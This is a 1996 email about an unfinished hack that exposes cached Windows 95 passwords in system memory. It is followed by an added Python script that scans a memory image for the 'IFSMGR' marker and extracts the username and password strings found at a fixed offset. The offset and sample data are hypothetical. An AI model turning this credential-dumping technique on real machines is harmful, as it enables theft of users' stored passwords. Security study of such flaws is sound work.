From: Rich Graves [SMTP:llurch@networking.stanford.edu]
Sent: Tuesday, January 16, 1996 2:00 PM
To: Simson L. Garfinkel
Subject: Re: MS story

Peter explained a bit about what he *could have* done when he provided the source code, and Frank Andrew Stevenson also had some ideas. The people below are working on an independent hack that will pop up stored passwords for Windows 95, again whether or not you have the 128-bit RC4 patch applied and have turned off persistent password caching to disk.

Brian Gorka described the exploit they're working on (but have not finished) in a message to cypherpunks:

A friend and I discovered this 'feature' accidentally. (Now that I've checked C2's Hack MSoft page, I see someone else exploited it in WFW.) Using heapwalker on WFW, we noticed the password cache was not encrypted. I wanted an official "C2 I hacked Micro$oft" tee-shirt, and we wondered if this was still true after the Windows 95 password cache 'fix'. We fired up heapwalker and found nothing. It won't let you look in that area.

BUT, after firing up SoftICE for Windows 95, we found the area in less than 5 minutes. It is in the C000 0000 memory area (the system area), and the password information is ALWAYS a constant offset from some text (IFSMGR, I think). Dumping it out is pretty easy, and as soon as we get some free time the rest of the code will flow; we have something in the way of output, but it's not pretty.
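The technique the message sketches (find a known text marker in a raw memory image, then read the data that sits a fixed distance past it) is a generic memory-carving step. Below is an added example of that step, not code from Rich Graves, Brian Gorka or the cypherpunks thread: it scans a memory image for the marker, dumps the region at a configured offset and pulls out any NUL-terminated printable strings. Everything beyond "a constant offset from some text" is an assumption: the offset value, the record layout (two C strings), the assumed base address and the sample image are all constructed for illustration, since the real offset never appears on the page.

```python
"""Scan a raw memory image for a text marker and dump the bytes at a fixed
offset past it.

Added example, not code from the original message. Only the idea of a
"constant offset from some text" comes from the message; the offset,
the record layout (two NUL-terminated strings) and the sample image
are hypothetical and constructed for illustration.
"""
import re
import string

MARKER = b"IFSMGR"     # text the message says the cache sits near
OFFSET = 0x40          # hypothetical: the real offset is not on the page
MAX_RECORD = 64        # hypothetical upper bound on how much to dump
PRINTABLE = string.printable.encode()


def find_markers(image: bytes, marker: bytes = MARKER) -> list[int]:
    """Return every offset at which `marker` occurs in the image."""
    return [m.start() for m in re.finditer(re.escape(marker), image)]


def carve_cstrings(buf: bytes, count: int = 2) -> list[str]:
    """Pull up to `count` NUL-terminated printable strings from the front of buf.
    Stops at the first empty or non-printable chunk."""
    out = []
    pos = 0
    for _ in range(count):
        end = buf.find(b"\x00", pos)
        if end < 0:
            break
        chunk = buf[pos:end]
        if not chunk or any(c not in PRINTABLE for c in chunk):
            break
        out.append(chunk.decode("ascii"))
        pos = end + 1
    return out


def hexdump(buf: bytes, base: int, width: int = 16) -> str:
    """Classic offset / hex / ASCII dump, addresses shown relative to `base`."""
    lines = []
    for i in range(0, len(buf), width):
        row = buf[i:i + width]
        hexpart = " ".join(f"{b:02x}" for b in row)
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in row)
        lines.append(f"{base + i:08x}  {hexpart:<{width * 3}} {asc}")
    return "\n".join(lines)


def dump_cache(image: bytes, base: int = 0xC0000000) -> list[dict]:
    """For each marker hit, return the record found at MARKER + OFFSET.
    `base` is the assumed virtual address of image[0]; the system area
    the message names starts at C000 0000, so that is the default."""
    results = []
    for off in find_markers(image):
        start = off + OFFSET
        region = image[start:start + MAX_RECORD]
        results.append({
            "marker_va": base + off,
            "record_va": base + start,
            "strings": carve_cstrings(region),
            "dump": hexdump(region, base + start),
        })
    return results


def sample_image() -> bytes:
    """Constructed sample image: filler bytes, the marker, padding, then a
    fake record of two C strings at the hypothetical offset."""
    img = bytearray(b"\x90" * 0x100)
    img[0x20:0x20 + len(MARKER)] = MARKER
    record = b"ALICE\x00hunter2\x00"          # constructed, not real data
    img[0x20 + OFFSET:0x20 + OFFSET + len(record)] = record
    return bytes(img)


if __name__ == "__main__":
    for rec in dump_cache(sample_image()):
        print(f"marker at {rec['marker_va']:08x}, record at {rec['record_va']:08x}")
        print("strings:", rec["strings"])
        print(rec["dump"])
```

Run against a real image, MARKER and OFFSET would be replaced with whatever the debugger session actually showed; the point of keeping them as module-level constants is that the scan, the carving and the dump do not change when the layout does.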